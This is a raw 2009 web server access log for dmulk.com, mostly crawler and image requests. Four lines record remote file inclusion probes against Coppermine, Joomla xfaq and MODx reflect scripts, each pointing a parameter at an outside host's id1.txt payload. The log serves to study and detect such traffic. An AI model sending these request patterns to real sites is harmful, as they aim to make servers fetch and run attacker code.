208.115.111.245 - - [20/Nov/2009:12:03:47 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:03:47 -0800] "GET /logs/access_080724.log%20%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:03:48 -0800] "GET /logs/access_081007.log%20%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:03:48 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture249-1024.jpg HTTP/1.1" 200 76211 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:04:00 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/042-2.jpg HTTP/1.1" 200 406632 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:04:14 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture143-1024.jpg HTTP/1.1" 200 120294 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
79.64.223.41 - - [20/Nov/2009:12:04:22 -0800] "GET /logs/access_081123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:04:26 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-087_1.jpg HTTP/1.1" 200 408915 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
66.102.237.81 - - [20/Nov/2009:12:04:36 -0800] "GET /logs/access_080228.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
